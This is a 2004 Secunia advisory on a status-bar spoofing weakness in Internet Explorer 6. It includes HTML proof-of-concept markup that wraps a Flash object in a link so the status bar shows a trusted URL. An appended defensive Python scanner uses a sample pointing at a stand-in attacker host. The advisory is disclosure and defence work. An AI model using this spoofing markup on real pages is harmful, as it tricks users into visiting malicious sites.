Internet Explorer Flash/Excel Content Status Bar Spoofing Weakness
Secunia Advisory: SA13156
Release Date: 2004-11-10
Last Update: 2004-11-17
Critical: Not critical
Impact: Security Bypass
Where: From remote
Solution Status: Unpatched
Software: Microsoft Internet Explorer 6.x
Description: Roozbeh Afrasiabi has discovered a weakness in Internet Explorer, which can be exploited by malicious people to trick users into visiting a malicious website by obfuscating URLs displayed in the status bar.
This weakness is a variant of SA13015.
Example:
<A HREF="http://[trusted_site]">
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"
WIDTH="300" HEIGHT="50" id="link" ALIGN="">
<!-- the status bar shows [trusted_site] from the HREF above, while the embedded movie decides where the click actually goes -->
<param NAME=movie VALUE="[malicious_flash]">
<param NAME=quality VALUE=high>
<param NAME=bgcolor VALUE=#FFFFFF>
<param NAME=menu VALUE=FALSE>
<embed src="[malicious_flash]" quality=high bgcolor=#FFFFFF WIDTH="300" HEIGHT="50" NAME="link" ALIGN=""
TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer">
</embed>
</object>
</A>
The problem has been confirmed in version 6.0 on a system running Windows XP with SP2 installed. Other versions may also be affected.
It is also possible to use an embedded Excel spreadsheet, as demonstrated by http-equiv.
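As an added defender-side example (not part of the Secunia advisory), a small Python scanner that flags the pattern described above: an anchor whose status-bar text comes from its HREF while the element inside it is an object/embed whose content comes from somewhere else. The hosts trusted.example and attacker.invalid in the sample are constructed placeholders standing in for the advisory's [trusted_site] and [malicious_flash].

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample (not from the advisory): an ordinary link, then a link
# wrapping a Flash object; the hosts stand in for the advisory's placeholders.
SAMPLE_HTML = """
<p><a href="http://trusted.example/">ordinary link</a></p>
<a href="http://trusted.example/">
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="300" height="50">
<param name="movie" value="http://attacker.invalid/redirect.swf">
<embed src="http://attacker.invalid/redirect.swf" type="application/x-shockwave-flash">
</object>
</a>
"""

ACTIVE_TAGS = {"object", "embed", "applet"}

class LinkWrappedActiveContent(HTMLParser):
    """Collects (anchor_href, tag, content_source) for active content nested in <a>."""

    def __init__(self):
        super().__init__()
        self.open_anchors = []  # hrefs of <a> elements not yet closed
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # HTMLParser lowercases tag and attribute names
        if tag == "a":
            self.open_anchors.append(attrs.get("href") or "")
        elif self.open_anchors and tag in ACTIVE_TAGS:
            self.findings.append([self.open_anchors[-1], tag, attrs.get("src") or attrs.get("data")])
        elif (self.open_anchors and tag == "param" and (attrs.get("name") or "").lower() == "movie"
              and self.findings and self.findings[-1][2] is None):
            self.findings[-1][2] = attrs.get("value")  # an <object> names its movie in a <param>

    def handle_endtag(self, tag):
        if tag == "a" and self.open_anchors:
            self.open_anchors.pop()

def find_link_wrapped_active_content(html):
    """Every object/embed/applet nested inside a link, as (href, tag, source) tuples."""
    parser = LinkWrappedActiveContent()
    parser.feed(html)
    return [tuple(f) for f in parser.findings]

def cross_host_findings(html):
    """Subset where the status-bar host (anchor) and the wrapped content's host disagree,
    or where the content source is not visible at all; a heuristic, not proof of abuse."""
    return [(href, tag, src) for href, tag, src in find_link_wrapped_active_content(html)
            if src is None or urlparse(src).hostname != urlparse(href).hostname]
```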
Solution: Never follow links from untrusted sources.
Disable the "Run ActiveX controls and plug-ins" setting for all but trusted sites.
Provided and/or discovered by: Roozbeh Afrasiabi
Further information provided by: http-equiv
Changelog: 2004-11-17: Added further information provided by http-equiv. Updated "Description" section.
Other References: SA13015: http://secunia.com/advisories/13015/
Please note: The information that this Secunia Advisory is based on comes from a third party unless stated otherwise.
Secunia collects, validates, and verifies all vulnerability reports issued by security research groups, vendors, and others.